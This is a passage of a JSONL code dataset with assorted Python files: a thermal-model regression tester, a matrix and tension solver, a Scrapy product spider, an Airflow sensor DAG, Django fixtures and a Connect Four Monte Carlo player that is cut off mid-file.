for j in range(13):\n self.buttons[i][j].grid(row=i, column=j)\n fenetre.mainloop()\n \n\nif(__name__ == \"__main__\"):\n card = CardDeck()\n card.printCardsMatrix()\n print(card.selectRange([\"AKo\",\"AA\",\"AKs\"]))\n \n ###########################################\n #Interface graphique\n ###########################################\n #card.CardsMatrixWindows()\n #card.buttons\n ","sub_path":"Poker 
project/cardDeck.py","file_name":"cardDeck.py","file_ext":"py","file_size_in_byte":5770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"496376255","text":"import os\nfrom numpy.testing import assert_array_equal, \\\n assert_allclose\nimport shutil\nimport tempfile\nimport pickle\nfrom pathlib import Path\n\nmonths = [\"JAN\", \"FEB\", \"MAR\", \"APR\", \"MAY\", \"JUN\",\n \"JUL\", \"AUG\", \"SEP\", \"OCT\", \"NOV\", \"DEC\"]\n\n# Loads for regression testing\ntest_loads = {\"normal\": [\"MAR0617A\", \"MAR2017E\", \"JUL3117B\", \"SEP0417A\"],\n \"interrupt\": [\"MAR1517B\", \"JUL2717A\", \"AUG2517C\", \"AUG3017A\",\n \"MAR0817B\", \"MAR1117A\", \"APR0217B\", \"SEP0917C\"]}\nall_loads = test_loads[\"normal\"]+test_loads[\"interrupt\"]\n\nnlets = {\"MAR0617A\", \"MAR0817B\", \"SEP0417A\"}\n\n\ndef get_lr_root():\n \"\"\"Get root directory for ACIS load review data.\n\n Try (in order):\n - /data/acis/LoadReviews\n - $SKA/data/acis/LoadReviews (for standalone installations)\n\n :returns: str, first path from above which exists.\n \"\"\"\n data_acis_lr = Path('data', 'acis', 'LoadReviews')\n path = '/' / data_acis_lr\n if not path.exists():\n path = os.environ['SKA'] / data_acis_lr\n if not path.exists():\n raise FileNotFoundError('no available ACIS load review directory')\n return str(path)\n\n\nclass TestArgs(object):\n \"\"\"\n A mock-up of a command-line parser object to be used with\n ACISThermalCheck testing.\n\n Parameters\n ----------\n name : string\n The \"short name\" of the temperature to be modeled.\n outdir : string\n The path to the output directory.\n model_path : string\n The path to the model code itself.\n run_start : string, optional\n The run start time in YYYY:DOY:HH:MM:SS.SSS format. If not\n specified, one will be created 3 days prior to the model run.\n load_week : string, optional\n The load week to be tested, in a format like \"MAY2016\". If not\n provided, it is assumed that a full set of initial states will\n be supplied.\n days : float, optional\n The number of days to run the model for. Default: 21.0\n T_init : float, optional\n The starting temperature for the run. If not set, it will be\n determined from telemetry.\n interrupt : boolean, optional\n Whether or not this is an interrupt load. Default: False\n state_builder : string, optional\n The mode used to create the list of commanded states. \"sql\" or\n \"acis\", default \"acis\".\n verbose : integer, optional\n The verbosity of the output. Default: 0\n model_spec : string, optional\n The path to the model specification file to use. Default is to\n use the model specification file stored in the model package.\n nlet_file : string, optional\n The path to an alternative NLET file to be used. Default: None,\n which is to use the default one. 
\n \"\"\"\n def __init__(self, name, outdir, model_path, run_start=None,\n load_week=None, days=21.0, T_init=None, interrupt=False,\n state_builder='acis', verbose=0, model_spec=None,\n nlet_file=None):\n from datetime import datetime\n self.load_week = load_week\n if run_start is None:\n year = 2000 + int(load_week[5:7])\n month = months.index(load_week[:3])+1\n day = int(load_week[3:5])\n run_start = datetime(year, month, day).strftime(\"%Y:%j:%H:%M:%S\")\n self.run_start = run_start\n self.outdir = outdir\n lr_root = get_lr_root() # Directory containing ACIS load review data\n # load_week sets the bsdir\n if load_week is None:\n self.backstop_file = None\n else:\n load_year = \"20%s\" % load_week[-3:-1]\n load_letter = load_week[-1].lower()\n self.backstop_file = \"%s/%s/%s/ofls%s\" % (lr_root, load_year, load_week[:-1], load_letter)\n self.days = days\n if nlet_file is None:\n nlet_file = f'{lr_root}/NonLoadTrackedEvents.txt'\n self.nlet_file = nlet_file\n self.interrupt = interrupt\n self.state_builder = state_builder\n self.pred_only = False\n self.T_init = T_init\n self.traceback = True\n self.verbose = verbose\n if model_spec is None:\n model_spec = os.path.join(model_path, \"%s_model_spec.json\" % name)\n self.model_spec = model_spec\n self.version = None\n if name == \"acisfp\":\n self.fps_nopref = os.path.join(model_path, \"FPS_NoPref.txt\")\n\n\ndef exception_catcher(test, old, new, data_type, **kwargs):\n if new.dtype.kind == \"S\":\n new = new.astype(\"U\")\n if old.dtype.kind == \"S\":\n old = old.astype(\"U\")\n try:\n test(old, new, **kwargs)\n except AssertionError:\n raise AssertionError(\"%s are not the same!\" % data_type)\n\n\nclass RegressionTester(object):\n def __init__(self, atc_class, model_path, model_spec, atc_args=None,\n atc_kwargs=None, test_root=None, sub_dir=None):\n self.model_path = model_path\n if atc_args is None:\n atc_args = ()\n if atc_kwargs is None:\n atc_kwargs = {}\n self.atc_obj = atc_class(*atc_args, **atc_kwargs)\n self.msid = self.atc_obj.msid\n self.name = self.atc_obj.name\n self.valid_limits = self.atc_obj.validation_limits\n self.hist_limit = self.atc_obj.hist_limit\n self.curdir = os.getcwd()\n if test_root is None:\n rootdir = tempfile.mkdtemp()\n else:\n rootdir = test_root\n if sub_dir is not None:\n rootdir = os.path.join(rootdir, sub_dir)\n self.outdir = os.path.abspath(rootdir)\n self.test_model_spec = os.path.join(model_path, \"tests\", model_spec)\n if not os.path.exists(self.outdir):\n os.makedirs(self.outdir, exist_ok=True)\n\n def run_model(self, load_week, run_start=None, state_builder='acis',\n interrupt=False, override_limits=None):\n \"\"\"\n Run a thermal model in test mode for a single load week.\n\n Parameters\n ----------\n load_week : string\n The load week to be tested, in a format like \"MAY2016A\".\n run_start : string, optional\n The run start time in YYYY:DOY:HH:MM:SS.SSS format. If not\n specified, one will be created 3 days prior to the model run.\n state_builder : string, optional\n The mode used to create the list of commanded states. \"sql\" or\n \"acis\", default \"acis\".\n interrupt : boolean, optional\n Whether or not this is an interrupt load. Default: False\n override_limits : dict, optional\n Override any margin by setting a new value to its name\n in this dictionary. 
SHOULD ONLY BE USED FOR TESTING.\n \"\"\"\n out_dir = os.path.join(self.outdir, load_week)\n if load_week in nlets:\n nlet_file = os.path.join(os.path.dirname(__file__), \n f'data/nlets/TEST_NLET_{load_week}.txt')\n else:\n nlet_file = None\n args = TestArgs(self.name, out_dir, self.model_path, run_start=run_start,\n load_week=load_week, interrupt=interrupt, nlet_file=nlet_file,\n state_builder=state_builder, model_spec=self.test_model_spec)\n self.atc_obj.run(args, override_limits=override_limits)\n\n def run_models(self, normal=True, interrupt=True, run_start=None,\n state_builder='acis'):\n \"\"\"\n Run the internally set list of models for regression testing.\n\n Parameters\n ----------\n normal : boolean, optional\n Run the \"normal\" loads. Default: True\n interrupt : boolean, optional\n Run the \"interrupt\" loads. Default: True\n run_start : string, optional\n The run start time in YYYY:DOY:HH:MM:SS.SSS format. If not\n specified, one will be created 3 days prior to the model run.\n state_builder : string, optional\n The mode used to create the list of commanded states. \"sql\" or\n \"acis\", default \"acis\".\n \"\"\"\n if normal:\n for load in test_loads[\"normal\"]:\n self.run_model(load, run_start=run_start,\n state_builder=state_builder)\n if interrupt:\n for load in test_loads[\"interrupt\"]:\n self.run_model(load, interrupt=True, run_start=run_start,\n state_builder=state_builder)\n\n def _set_answer_dir(self, load_week):\n answer_dir = os.path.join(self.model_path, \"tests/answers\",\n load_week)\n if not os.path.exists(answer_dir):\n os.makedirs(answer_dir)\n return answer_dir\n\n def run_test(self, test_name, load_week, answer_store=False):\n \"\"\"\n This method runs the answer test in one of two modes:\n either comparing the answers from this test to the \"gold\n standard\" answers or to simply run the model to generate answers.\n\n Parameters\n ----------\n test_name : string\n The name of the test to run. \"prediction\" or \"validation\".\n load_week : string\n The load week to be tested, in a format like \"MAY2016A\".\n answer_store : boolean, optional\n If True, store the generated data as the new answers.\n If False, only test. Default: False\n \"\"\"\n out_dir = os.path.join(self.outdir, load_week)\n if test_name == \"prediction\":\n filenames = [\"temperatures.dat\", \"states.dat\"]\n if self.name == \"acisfp\":\n filenames.append(\"earth_solid_angles.dat\")\n elif test_name == \"validation\":\n filenames = [\"validation_data.pkl\"]\n else:\n raise RuntimeError(\"Invalid test specification! 
\"\n \"Test name = %s.\" % test_name)\n if not answer_store:\n compare_test = getattr(self, \"compare_\"+test_name)\n compare_test(load_week, out_dir, filenames)\n else:\n answer_dir = self._set_answer_dir(load_week)\n self.copy_new_files(out_dir, answer_dir, filenames)\n\n def compare_validation(self, load_week, out_dir, filenames):\n \"\"\"\n This method compares the \"gold standard\" validation data \n with the current test run's data.\n\n Parameters\n ----------\n load_week : string\n The load week to be tested, in a format like \"MAY2016A\".\n out_dir : string\n The path to the output directory.\n filenames : list of strings\n The list of files which will be used in the comparison.\n Currently only \"validation_data.pkl\".\n \"\"\"\n # First load the answers from the pickle files, both gold standard\n # and current\n new_answer_file = os.path.join(out_dir, filenames[0])\n new_results = pickle.load(open(new_answer_file, \"rb\"))\n old_answer_file = os.path.join(self.model_path, \"tests/answers\", load_week,\n filenames[0])\n old_results = pickle.load(open(old_answer_file, \"rb\"))\n # Compare predictions\n new_pred = new_results[\"pred\"]\n old_pred = old_results[\"pred\"]\n pred_keys = set(new_pred.keys()) | set(old_pred.keys())\n for k in pred_keys:\n if k not in new_pred:\n print(\"WARNING in pred: '%s' in old answer but not new. Answers should be updated.\" % k)\n continue\n if k not in old_pred:\n print(\"WARNING in pred: '%s' in new answer but not old. Answers should be updated.\" % k)\n continue\n exception_catcher(assert_allclose, new_pred[k], old_pred[k],\n \"Validation model arrays for %s\" % k, rtol=1.0e-5)\n # Compare telemetry\n new_tlm = new_results['tlm']\n old_tlm = old_results['tlm']\n tlm_keys = set(new_tlm.dtype.names) | set(old_tlm.dtype.names)\n for k in tlm_keys:\n if k not in new_tlm.dtype.names:\n print(\"WARNING in tlm: '%s' in old answer but not new. Answers should be updated.\" % k)\n continue\n if k not in old_tlm.dtype.names:\n print(\"WARNING in tlm: '%s' in new answer but not old. Answers should be updated.\" % k)\n continue\n exception_catcher(assert_array_equal, new_tlm[k], old_tlm[k],\n \"Validation telemetry arrays for %s\" % k)\n\n def compare_prediction(self, load_week, out_dir, filenames):\n \"\"\"\n This method compares the \"gold standard\" prediction data with \n the current test run's data for the .dat files produced in the \n thermal model run.\n\n Parameters\n ----------\n load_week : string\n The load week to be tested, in a format like \"MAY2016A\".\n out_dir : string\n The path to the output directory.\n filenames : list of strings\n The list of files which will be used in the comparison.\n \"\"\"\n from astropy.io import ascii\n for fn in filenames:\n new_fn = os.path.join(out_dir, fn)\n old_fn = os.path.join(self.model_path, \"tests/answers\", load_week, fn)\n new_data = ascii.read(new_fn).as_array()\n old_data = ascii.read(old_fn).as_array()\n # Compare test run data to gold standard. 
Since we're loading from\n # ASCII text files here, floating-point comparisons will be different\n # at machine precision, others will be exact.\n for k, dt in new_data.dtype.descr:\n if 'f' in dt:\n exception_catcher(assert_allclose, new_data[k], old_data[k],\n \"Prediction arrays for %s\" % k, rtol=1.0e-5)\n else:\n exception_catcher(assert_array_equal, new_data[k], old_data[k],\n \"Prediction arrays for %s\" % k)\n \n def copy_new_files(self, out_dir, answer_dir, filenames):\n \"\"\"\n This method copies the files generated in this test\n run to a directory specified by the user, typically for\n inspection and for possible updating of the \"gold standard\"\n answers.\n\n Parameters\n ----------\n out_dir : string\n The path to the output directory.\n answer_dir : string\n The path to the directory to which to copy the files.\n filenames : list of strings\n The filenames to be copied.\n \"\"\"\n for filename in filenames:\n fromfile = os.path.join(out_dir, filename)\n tofile = os.path.join(answer_dir, filename)\n shutil.copyfile(fromfile, tofile)\n\n def check_violation_reporting(self, load_week, viol_json, \n answer_store=False):\n \"\"\"\n This method runs loads which report violations of\n limits and ensures that they report the violation,\n as well as the correct start and stop times.\n\n Parameters\n ----------\n load_week : string\n The load to check. \n model_spec : string\n The path to the model specification file to\n use. For this test, to ensure the violation is\n reported in the same way, we must use the same\n model specification file that was used at the\n time of the run.\n viol_json : string\n Path to the JSON file containing the answers\n for the violation data.\n answer_store : boolean, optional\n If True, store the generated data as the new answers.\n If False, only test. Default: False\n \"\"\"\n import json\n with open(viol_json, \"r\") as f:\n viol_data = json.load(f)\n if answer_store:\n viol_data[\"datestarts\"] = []\n viol_data[\"datestops\"] = []\n viol_data[\"duration\"] = []\n viol_data[\"temps\"] = []\n if self.msid == \"fptemp\":\n viol_data[\"obsids\"] = []\n load_year = \"20%s\" % load_week[-3:-1]\n next_year = f\"{int(load_year)+1}\"\n self.run_model(load_week, run_start=viol_data['run_start'], \n override_limits=viol_data['limits'])\n out_dir = os.path.join(self.outdir, load_week)\n index_rst = os.path.join(out_dir, \"index.rst\")\n with open(index_rst, 'r') as myfile:\n i = 0\n for line in myfile.readlines():\n if line.startswith(\"Model status\"):\n assert \"NOT OK\" in line\n if line.startswith(load_year) or line.startswith(next_year):\n if answer_store:\n words = line.strip().split()\n viol_data[\"datestarts\"].append(words[0])\n viol_data[\"datestops\"].append(words[1])\n viol_data[\"duration\"].append(words[2])\n viol_data[\"temps\"].append(words[3])\n if self.msid == \"fptemp\":\n viol_data[\"obsids\"].append(words[4])\n else:\n try:\n assert viol_data[\"datestarts\"][i] in line\n assert viol_data[\"datestops\"][i] in line\n assert viol_data[\"duration\"][i] in line\n assert viol_data[\"temps\"][i] in line\n if self.msid == \"fptemp\":\n assert viol_data[\"obsids\"][i] in line\n except AssertionError:\n raise AssertionError(\"Comparison failed. 
Check file at \"\n \"%s.\" % index_rst)\n i += 1\n if answer_store:\n with open(viol_json, \"w\") as f:\n json.dump(viol_data, f, indent=4)\n\n","sub_path":"acis_thermal_check/regression_testing.py","file_name":"regression_testing.py","file_ext":"py","file_size_in_byte":17968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"475093198","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 17 20:32:52 2019\n\n@author: user\n\"\"\"\n\nimport numpy as np\nimport scipy.linalg as sp\nimport matplotlib.pyplot as plt\n\n\n\ndef LU_lin_solver(A,b):\n '''Calculates the solution to a linear equation using LU decomposition.'''\n lu,piv=sp.lu_factor(A)\n \n return sp.lu_solve((lu,piv),b)\n\n\ndef Minor(A,i,j):\n '''calculates the matrix of minors for a NxN matrix, A, around some matrix element i,j.'''\n #For calculating the matrix of cofactors and for calculating the determinant of an N>2 matrix\n #I will need to be able to calculate a matrix of minors\n N=A.shape[0]\n minor=np.zeros((N-1,N-1))\n cork=0\n #As we move past k=i I need to correct the k values using cork.\n #This is so that elements in the NxN matrix will correspond to a position in the minor matrix.\n for k in range(N):\n if k==i:\n cork=1\n else:\n corh=0\n for h in range(N):\n if h==j:\n corh=1\n else:\n minor[k-cork][h-corh]=A[k][h]\n \n return minor\n\n\ndef Det(A):\n '''Calculates the determinant of an NxN matrix, A.'''\n N=A.shape[0]\n #Only going to use square matrices so should just be able to take first element\n if N==2:\n return A[0,0]*A[1,1]-A[0,1]*A[1,0]\n \n elif N>2:\n #For n>2 we need to create a matrix of minors.\n #The code will have to keep looping until the NxN matrix is reduced to a series of 2x2 matrices.\n det=0\n for i in range(N):\n det+=((-1)**i)*A[0][i]*Det(Minor(A,0,i))\n \n \n return det \n\ndef Cofactors(A,Transpose=True):\n '''Returns the Transpose of the cofactors for a NxN matrix, A, if \n Transpose=True. If Transpose=False then the function will return the matrix of cofactors'''\n N=A.shape[0]\n cofactors=np.zeros((N,N))\n #When calculating the inverse we want the transpose of the cofactors.\n #So unless specified otherwise this function will return the transpose of the cofactors \n for i in range(N):\n for j in range(N):\n cofactors[i][j]= ((-1)**(i+j))*Det(Minor(A,i,j))\n \n if Transpose==True:\n transpose=np.zeros((N,N))\n for k in range(N):\n for l in range(N):\n transpose[l,k]=cofactors[k,l]\n return transpose \n \n else:\n return cofactors \n\ndef Invert(A):\n '''Calculates the inverse of a matrix A.'''\n N=A.shape[0]\n if N==2:\n invert=(1/Det(A))*np.array([[A[1,1],-A[0,1]],[-A[1,0],A[0,0]]])\n \n else:\n invert=(1/Det(A))*Cofactors(A,True)\n \n return invert\n\ndef Matrix_multiplication(A,B):\n '''Multiplies two matrices A and B together. Matrices do not commute so make \\n\n sure the order of the matrices is correct.'''\n AShape=A.shape\n BShape=B.shape\n Product=np.zeros((AShape[0],BShape[1]))\n #When multiplying two matrices mxn and nxp the new matrix that is formed is given by mxp \n for i in range(AShape[0]):\n for j in range(BShape[0]):\n for k in range(len(B)):\n Product[i][j]+=A[i][k]*B[k][j]\n \n return Product\n \ndef Max_error(inv,A):\n '''Finds the error of a function that calculates the inverse of a matrix.'''\n '''The argument inv is the function I want to test and A is the matrix I am''' \n '''using to test the function. 
This function calculates the inverse of a matrix'''\n '''then it multiplies the matrix by the inverse; the product should be equal to the''' \n '''identity matrix. This function calculates the difference between the product and''' \n '''the identity and takes the largest element as the error'''\n \n N=A.shape[0]\n Identity=np.identity(N)\n B=inv(A)\n ide=Matrix_multiplication(A,B)\n diff=ide-Identity\n return np.max(abs(diff))\n\ndef Lin_solver(A,b):\n '''Calculates the solution to a linear equation using Cramer's rule.'''\n return np.dot(Invert(A),b)\n\ndef SVD_lin_solver(A,b):\n '''This function uses SVD decomposition to calculate the solution to a linear equation.'''\n #Decomposes A into U,Sigma,VT where U and VT are orthogonal and Sigma holds the singular values. \n U,Sigma,VT=np.linalg.svd(A)\n UT=np.transpose(U)\n w=np.dot(UT,b)\n #np.linalg.svd returns sigma as a vector so need to diagonalise it\n S=np.diag(Sigma)\n c=np.linalg.solve(S,w)\n V=np.transpose(VT)\n x=np.dot(V,c)\n \n return x\n\n\n\nb=np.array([0,70*9.81])\n\nT1=[]\nT2=[]\nList1=[]\nList2=[]\n\nfor y in np.linspace(0,7,100):\n for x in np.linspace(0,15,100):\n \n cos1=x/np.sqrt((x**2)+((8-y)**2))\n sin1=(8-y)/np.sqrt((x**2)+((8-y)**2))\n \n cos2=(15-x)/np.sqrt(((15-x)**2)+((8-y)**2))\n sin2=(8-y)/np.sqrt(((15-x)**2)+((8-y)**2))\n \n Matrix_coefficents=np.array([[cos1,-cos2],[sin1,sin2]])\n \n Tension2d=SVD_lin_solver(Matrix_coefficents,b)\n \n List1.append(Tension2d[0])\n List2.append(Tension2d[1])\n \n T1.append(List1)\n T2.append(List2)\n List1=[]\n List2=[]\n \n \nplt.title('Tension in wire 1') \nplt.imshow(T1,origin='lower',extent=[0,15,0,7])\nplt.colorbar(label='Tension (N)')\nplt.xlabel('X position (m)')\nplt.ylabel('Y position (m)')\nplt.show()\nplt.clf()\n\nplt.title('Tension in wire 2')\nplt.imshow(T2,origin='lower',extent=[0,15,0,7])\nplt.colorbar(label='Tension(N)')\nplt.xlabel('X position (m)')\nplt.ylabel('Y position (m)')\nplt.show()\nplt.clf()","sub_path":"Task 3 A.py","file_name":"Task 3 A.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"621015276","text":"from app.common_reply import get_reply_from_mapping_function\nfrom app.rabbit import my_rabbit, adopt_rabbit\n\n\npattern_mapping_private = [\n {\n 'cmd': '我的兔子',\n 'type': 'equal',\n 'function': my_rabbit,\n 'multi_type_output': True\n },\n {\n 'cmd': '領養兔子',\n 'type': 'equal',\n 'function': adopt_rabbit,\n 'multi_type_output': True\n },\n]\n\n\ndef private_reply(msg_info, robot_settings):\n reply = get_reply_from_mapping_function(msg_info, robot_settings, pattern_mapping_private)\n if reply:\n return reply\n","sub_path":"app/private_reply.py","file_name":"private_reply.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"364706575","text":"import scrapy\nimport re\nimport os\nimport requests\nimport json\n\n# USER_AGENT = 'Chrome/77.0.3865.90' in settings.py\n\nclass pepperfrySpider(scrapy.Spider):\n name = \"pepperfrySpider\"\n BASE_DIR = \"./Pepperfry_data/\"\n MAX_CNT = 20\n\n def start_requests(self):\n # base url of the website\n BASE_URL = \"https://www.pepperfry.com/site_product/search?q=\"\n\n # used to search a specific item\n items = [\"book cases\", \"bean bags\"]\n\n urls = []\n dir_names = []\n\n for item in items:\n query_string = '+'.join(item.split(' '))\n dir_name = '-'.join(item.split(' '))\n dir_names.append(dir_name)\n urls.append(BASE_URL + 
query_string)\n # store directory names and urls the items\n\n dir_path = self.BASE_DIR + dir_name\n # name the directory\n\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n # if the directory does not exist, then create it\n \n\n #print(self.urls)\n # traverse all the urls\n for i in range(len(urls)):\n d = {\n \"dir_name\": dir_names[i]\n }\n # d gets the directory where current url things need to be saved\n\n resp = scrapy.Request(url = urls[i], callback = self.parse, dont_filter = True)\n resp.meta['dir_name'] = dir_names[i]\n yield resp\n \n def parse(self, response, **meta):\n product_urls = response.xpath('//div/div/div/h2/a/@href').extract()\n # get the url of the specific item of the product searched above\n\n counter = 0\n\n #print(product_urls)\n\n for url in product_urls:\n resp = scrapy.Request(url = url.split('?', 1)[0], callback = self.parse_item, dont_filter = True)\n resp.meta['dir_name'] = response.meta['dir_name']\n\n if counter == self.MAX_CNT:\n break\n\n if not resp == None:\n counter += 1\n\n yield resp\n\n def parse_item(self, response, **meta):\n item_title = response.xpath('//div/div/div/h1/text()').extract()[0]\n item_price = response.xpath('//div/div/div/span[@class=\"vip-our-price-amt font-18 pf-text-dark-grey pf-bold-txt\"]/text()').extract()[0].strip()\n\n item_brand = response.xpath('//span[@itemprop=\"brand\"]/text()').extract()\n\n d = {\n 'Item title': item_title,\n 'Item price': item_price,\n 'Item brand': item_brand\n }\n\n img_url_list = response.xpath('//li[@class=\"vip-options-slideeach\"]/a/@data-img').extract()\n\n\n # create another directory for a particular type of searched product\n CATEGORY_NAME = response.meta['dir_name']\n ITEM_DIR_URL = os.path.join(self.BASE_DIR, os.path.join(CATEGORY_NAME, item_title))\n\n\n if not os.path.exists(ITEM_DIR_URL):\n os.makedirs(ITEM_DIR_URL)\n\n # save directory in json format as metadata.txt\n with open(os.path.join(ITEM_DIR_URL, 'metadata.txt'), \"w\") as f:\n json.dump(d, f)\n\n # travel all the image urls and save the images as jpg\n for i, img_url in enumerate(img_url_list):\n if i == 2:\n break\n \n r = requests.get(img_url)\n\n with open(os.path.join(ITEM_DIR_URL, 'image_{}.jpg'.format(i)), 'wb') as f:\n f.write(r.content)\n\n \n yield d","sub_path":"pepperfry/pepperfry/spiders/my_spider.py","file_name":"my_spider.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"293839532","text":"from datetime import timedelta\r\nimport os\r\n\r\nfrom airflow import DAG\r\nfrom airflow.operators.bash import BashOperator\r\nfrom airflow.sensors.python import PythonSensor\r\n\r\nfrom airflow.utils.dates import days_ago\r\n\r\n\r\ndefault_args = {\r\n \"owner\": \"airflow\",\r\n \"depends_on_past\": False,\r\n \"start_date\": days_ago(2),\r\n \"retries\": 1,\r\n \"retry_delay\": timedelta(minutes=5),\r\n}\r\n\r\n\r\ndef _data_ready_for_train():\r\n return os.path.exists(\"/opt/airflow/data/processed/{{ ds }}/data.csv\")\r\n\r\n\r\ndef _data_ready_for_predict():\r\n return os.path.exists(\"/opt/airflow/data/raw/{{ ds }}/data.csv\")\r\n\r\n\r\nwith DAG(\r\n \"data_ready_sensor\",\r\n default_args=default_args,\r\n description=\"This DAG checks that data is ready\",\r\n schedule_interval=timedelta(days=1),\r\n) as dag:\r\n wait_data_ready_for_train = PythonSensor(\r\n task_id=\"data_ready_for_train\",\r\n python_callable=_data_ready_for_train,\r\n timeout=6000,\r\n poke_interval=10,\r\n retries=100,\r\n 
mode=\"poke\",\r\n )\r\n\r\n wait_data_ready_for_predict = PythonSensor(\r\n task_id=\"data_ready_for_predict\",\r\n python_callable=_data_ready_for_predict,\r\n timeout=6000,\r\n poke_interval=10,\r\n retries=100,\r\n mode=\"poke\",\r\n )\r\n\r\n t = BashOperator(\r\n task_id=\"touch_file\",\r\n bash_command=\"touch /opt/airflow/data/ready.txt\",\r\n )\r\n\r\n wait_data_ready_for_train >> wait_data_ready_for_predict >> t","sub_path":"airflow_ml_dags/dags/data_ready_sensor.py","file_name":"data_ready_sensor.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"642255522","text":"# encoding: utf-8\n\"\"\"Rope element sample data factories.\"\"\"\nimport importlib\nimport json\nimport os\n\nimport factory\n\nfrom . import models\n\nfixtures_dir = os.path.join(os.path.dirname(\n importlib.import_module('ropeelements').__file__), 'fixtures')\n\n\ndef load(name):\n with open(os.path.join(fixtures_dir, name + '.json'), 'r') as fd:\n return json.loads(fd.read())\n\n\nclass ConfigFactory(factory.django.DjangoModelFactory):\n class Meta:\n model = models.Config\n\n\ndef create_config():\n [ConfigFactory.create(**data) for data in load('config')]\n\n\nclass DifficultyFactory(factory.django.DjangoModelFactory):\n class Meta:\n model = models.Difficulty\n\n\ndef create_difficulties():\n [DifficultyFactory.create(**data) for data in load('difficulties')]\n\n\nclass KindFactory(factory.django.DjangoModelFactory):\n class Meta:\n model = models.Kind\n\n title_en = 'Seilrutschen'\n title_de = 'Zip Lines & Downward'\n\n\ndef create_kinds():\n [KindFactory.create(**data) for data in load('kinds')]\n\n\ndef find_or_create_kind(title_en):\n try:\n return models.Kind.objects.get(title_en=title_en)\n except models.Kind.DoesNotExist:\n return KindFactory.create(title_en=title_en)\n\n\ndef image_path(filename):\n return os.path.normpath(os.path.join(fixtures_dir, 'images', filename))\n\n\nclass ElementFactory(factory.django.DjangoModelFactory):\n class Meta:\n model = models.Element\n\n image = factory.django.ImageField()\n thumbnail = factory.django.ImageField()\n\n\ndef create_element(**data):\n data['kind'] = find_or_create_kind(data.pop('kind_en'))\n if 'image' in data:\n data['image__from_path'] = image_path(data['image'])\n del data['image']\n else:\n data['image'] = None\n if 'thumbnail' in data:\n data['thumbnail__from_path'] = image_path(data['thumbnail'])\n del data['thumbnail']\n else:\n data['thumbnail'] = None\n\n ElementFactory.create(**data)\n\n\ndef create_elements():\n [create_element(**data) for data in load('elements')]\n","sub_path":"ropeelements/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"578793400","text":"import numpy as np\nimport random\nimport pygame\nimport sys\nimport math\nimport time\nimport threading\n\nBLUE = (0, 0, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\n\nROW_COUNT = 6\nCOLUMN_COUNT = 7\n\nPLAYER = 0\nAI = 1\n\nEMPTY = 0\nPLAYER_PIECE = 1\nAI_PIECE = 2\n\nWINDOW_LENGTH = 4\n\ntotal_samples = 0\ngrand_total_samples = 0\n\npayouts1 = {}\npayouts2 = {}\npayouts3 = {}\npayouts4 = {}\ngrandPayouts = {}\n\nthreadLock = threading.Lock()\nthreads = []\n\n\nclass myThread (threading.Thread):\n def __init__(self, board, payouts):\n threading.Thread.__init__(self)\n self.board = board\n self.payouts = payouts\n\n def run(self):\n 
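# Added comment: threadLock is a single global lock, so the four search threads below actually execute one at a time rather than in parallel.\n 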
# Get lock to synchronize threads\n threadLock.acquire()\n monte_carlo(self.board, self.payouts)\n # Free lock to release next thread\n threadLock.release()\n\n\ndef create_board():\n board = np.zeros((ROW_COUNT, COLUMN_COUNT))\n return board\n\n\ndef drop_piece(board, row, col, piece):\n board[row][col] = piece\n\n\ndef is_valid_location(board, col):\n return board[ROW_COUNT - 1][col] == 0\n\n\ndef get_next_open_row(board, col):\n for r in range(ROW_COUNT):\n if board[r][col] == 0:\n return r\n\n\ndef print_board(board):\n print(np.flip(board, 0))\n\n\ndef winning_move(board, piece):\n # Check horizontal locations for win\n for c in range(COLUMN_COUNT - 3):\n for r in range(ROW_COUNT):\n if board[r][c] == piece and board[r][c + 1] == piece and board[r][c + 2] == piece and board[r][\n c + 3] == piece:\n return True\n\n # Check vertical locations for win\n for c in range(COLUMN_COUNT):\n for r in range(ROW_COUNT - 3):\n if board[r][c] == piece and board[r + 1][c] == piece and board[r + 2][c] == piece and board[r + 3][\n c] == piece:\n return True\n\n # Check positively sloped diaganols\n for c in range(COLUMN_COUNT - 3):\n for r in range(ROW_COUNT - 3):\n if board[r][c] == piece and board[r + 1][c + 1] == piece and board[r + 2][c + 2] == piece and board[r + 3][\n c + 3] == piece:\n return True\n\n # Check negatively sloped diaganols\n for c in range(COLUMN_COUNT - 3):\n for r in range(3, ROW_COUNT):\n if board[r][c] == piece and board[r - 1][c + 1] == piece and board[r - 2][c + 2] == piece and board[r - 3][\n c + 3] == piece:\n return True\n\n\ndef is_terminal_node(board):\n return winning_move(board, PLAYER_PIECE) or winning_move(board, AI_PIECE) or len(get_valid_locations(board)) == 0\n\n\ndef calc_conf_interval(wins, draws, move_samples, total_samples):\n first_term = (wins + (draws / 2)) / move_samples\n second_term = 2 * math.sqrt(((np.log(total_samples)) / move_samples))\n return first_term + second_term\n\n\ndef monte_carlo(board, payouts):\n # dict of nodes and payouts\n count = 0\n start_time = time.time()\n seconds = 10\n global total_samples\n # check if position is terminal\n while not (is_terminal_node(board)):\n conf_interval = 0\n\n # begin monte carlo search\n while True:\n current_time = time.time()\n elapsed_time = current_time - start_time\n if elapsed_time > seconds:\n break\n board_copy = board.copy()\n selected_move = selection(board_copy, total_samples, payouts)\n # use map/reduce for this\n total_samples += simulation(board_copy, selected_move, payouts)\n count += 1\n\n print(count)\n return selected_move\n\n\n# calculates confidence interval for each valid move and returns move with highest interval.\n# priority given to moves that are unsampled\ndef selection(board_copy, total_moves, payouts):\n max_conf = 0\n max_move = ()\n open_cols = get_valid_locations(board_copy)\n for col in open_cols:\n row = get_next_open_row(board_copy, 